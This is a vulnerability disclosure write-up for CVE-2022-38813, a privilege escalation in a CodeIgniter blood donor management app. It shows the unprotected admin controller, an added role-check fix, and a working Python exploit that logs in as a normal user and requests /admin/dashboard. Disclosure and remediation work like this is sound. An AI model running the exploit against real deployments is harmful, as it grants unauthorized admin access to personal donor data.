
Escaping Boundaries - CVE-2022-38813 - Privilege Escalation in Blood Donor Management System Using CodeIgniter v1.0

Description: This writeup covers a security vulnerability (CVE-2022-38813) discovered in Blood Donor Management System v1.0, built on CodeIgniter. The flaw allows an authenticated normal user to elevate privileges to administrator by rewriting the ‘user’ segment of the URL path to ‘admin’, leading to unauthorized access to the admin dashboard and potential data manipulation.

Introduction: Blood Donor Management System v1.0, a PHP web application built on CodeIgniter, was found to be susceptible to a vertical privilege escalation vulnerability. This writeup details the technical aspects of the vulnerability and the affected components, and provides a Python exploit script for practical demonstration.

Technical Description: The vulnerability stems from inconsistent access control between the ‘users.php’ and ‘admin.php’ dashboard controllers. The user-side controller checks for a ‘uid’ session value in its constructor and redirects to the login page when it is absent; the admin-side controller performs no such check, and no role check either. CodeIgniter routes the first URL segment to a controller directory, so an authenticated user who changes ‘/user/dashboard’ to ‘/admin/dashboard’ is served the admin dashboard, from which they can view, modify, and delete user data, manage blood groups, and submit reports.

Affected Components - Source Code:

In ‘users.php’:

class Dashboard extends CI_Controller
{
    function __construct()
    {
        parent::__construct();
        // Authentication gate: a request without 'uid' in the session is sent to the login page
        if (!$this->session->userdata('uid'))
            redirect('user/login');
    }

    public function index()
    {
        $this->load->view('user/dashboard');
    }
}

In ‘admin.php’:

class Dashboard extends CI_Controller
{
    // No constructor, so neither a session check nor a role check runs before index()
    public function index()
    {
        $this->load->model('admin/Dashboard_Model', 'adminn');
        // Additional code for admin dashboard...
        $this->load->view('admin/dashboard', ['totalusercount' => $totalusercount, 'totalbloodgroupcount' => $totalbloodgroupcount]);
    }
}
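The fix is to put the missing gate in one place that every admin controller inherits, rather than copying the constructor check from users.php into each file. The following is an added example of that pattern, not code from the Blood Donor Management System project: the file paths, the class names MY_Controller, User_Controller and Admin_Controller, and the session key ‘role’ with the value ‘admin’ are assumptions (only ‘uid’ comes from the page). It uses CodeIgniter 3's redirect() and show_error() helpers, which the page's own controllers already rely on.

```php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

/*
 * application/core/MY_Controller.php  (added example, not the project's code)
 *
 * CodeIgniter 3 autoloads MY_Controller from application/core; the other
 * classes are kept in the same file so every controller can extend them.
 * Assumed session keys: 'uid' (taken from users.php above) marks a logged-in
 * user, and 'role' === 'admin' marks an administrator. Both values must be set
 * server-side at login from the database, never taken from the request.
 */

class MY_Controller extends CI_Controller
{
    public function __construct()
    {
        parent::__construct();
        $this->load->library('session');
        $this->load->helper('url');
    }
}

/* Base class for everything under application/controllers/user/ */
class User_Controller extends MY_Controller
{
    public function __construct()
    {
        parent::__construct();
        // Authentication gate: the same check the page's users.php performs
        if (!$this->session->userdata('uid')) {
            redirect('user/login');   // sends the Location header and exits
        }
    }
}

/* Base class for everything under application/controllers/admin/ */
class Admin_Controller extends MY_Controller
{
    public function __construct()
    {
        parent::__construct();
        // Gate 1: authentication. Anonymous requests go to the login page.
        if (!$this->session->userdata('uid')) {
            redirect('user/login');
        }
        // Gate 2: authorization. A logged-in normal user who rewrites
        // /user/dashboard to /admin/dashboard now receives a 403, not the panel.
        if ($this->session->userdata('role') !== 'admin') {
            show_error('You are not authorized to access this page.', 403);
        }
    }
}

/* application/controllers/admin/Dashboard.php */
class Dashboard extends Admin_Controller
{
    // No constructor needed here: both gates run in Admin_Controller before index().
    public function index()
    {
        $this->load->model('admin/Dashboard_Model', 'adminn');
        // ... remainder unchanged from the admin dashboard controller shown above
    }
}
```

Only controllers that extend Admin_Controller are protected, so every file under controllers/admin/ (user management, blood groups, reports) has to be switched over; a post_controller_constructor hook that performs the same two checks for any URI beginning with admin/ is the alternative if you would rather not touch each controller. To verify the fix, log in as a normal user and request /admin/dashboard: the response should now be a 403, and the same request without a session cookie should redirect to user/login.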

Exploit: The Python script below automates the exploitation process. It authenticates as a normal user, keeps the resulting session, then requests the dashboard with the ‘user’ path segment replaced by ‘admin’, which returns the admin panel.

import argparse
import sys

import requests
from termcolor import cprint

color = "green"
cprint("[+] CVE-2022-38813 Authenticated Privilege Escalation in Blood Donor Management System v1.0", color)
cprint("[+] Author: RashidKhan Pathan aka iHexCoder", color)
cprint("[!] Usage: python3 exploit.py <username> <password> <payload>", color)
cprint("[!] Example: python3 exploit.py johndoe@gmail.com Test@123 admin", color)


class PrivilegeEscalation:
    color = "green"

    def __init__(self, username, password, payload, base_url="http://localhost/blood"):
        self.username = username
        self.password = password
        self.payload = payload
        self.base_url = base_url.rstrip("/")
        # One session object so the cookie issued at login is sent with the admin request
        self.session = requests.Session()

    def authentication(self):
        cprint("[+] Authenticating User", self.color)
        cprint("[+] Username: " + self.username, self.color)
        cprint("[+] Password: " + self.password, self.color)
        cprint("[+] Payload: " + self.payload, self.color)

        login_url = f"{self.base_url}/user/login"
        data = {
            "email": self.username,
            "password": self.password
        }
        login_response = self.session.post(login_url, data=data)

        cprint("[+] Exploiting...Started", self.color)
        # A failed login lands back on /user/login; a successful one redirects to user/dashboard
        if "/user/login" in login_response.url:
            cprint("[-] Credentials are not valid", "red")
            sys.exit(1)
        cprint("[+] Authenticated Successfully as a Normal User", self.color)
        cprint("[+] Normal User URL Endpoint " + login_response.url, self.color)

        if self.payload != "admin":
            cprint("[-] Please add a valid payload (expected: admin)", "red")
            sys.exit(1)

        # Swap the 'user' path segment for 'admin': /user/dashboard -> /admin/dashboard
        response = self.session.get(f"{self.base_url}/{self.payload}/dashboard")
        if "/login" in response.url or response.status_code != 200:
            cprint("[-] Admin dashboard was not served (HTTP %d, %s); target may be patched"
                   % (response.status_code, response.url), "red")
            sys.exit(1)

        cprint("[+] Exploit Completed", self.color)
        cprint("[+] Accessed Admin Panel Successfully " + response.url, self.color)
        cprint("[+] In the browser, replace user/dashboard in the URL with " + response.url, self.color)
        cprint("[+] After replacing it you should see the bypassed admin panel", self.color)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("username", help="Please Add Username", type=str)
    parser.add_argument("password", help="Please Add Password", type=str)
    parser.add_argument("payload", help="Please Add Payload (admin)", type=str)
    parser.add_argument("--url", default="http://localhost/blood", help="Base URL of the application")
    args = parser.parse_args()

    privilege_escalation = PrivilegeEscalation(args.username, args.password, args.payload, args.url)
    privilege_escalation.authentication()

# Usage: python3 CVE-2022-38813.py <username> <password> <payload> [--url http://host/blood]
# Example: python3 CVE-2022-38813.py johndoe@gmail.com Test@123 admin

Proof of Concept: A video demonstrating successful exploitation of the vulnerability is provided, showing a normal user reaching the admin panel.

References:

Discovered & Developed by: RashidKhan Pathan (iHexCoder), 9 September 2022. Twitter: @itRashid

This post is licensed under CC BY 4.0 by the author.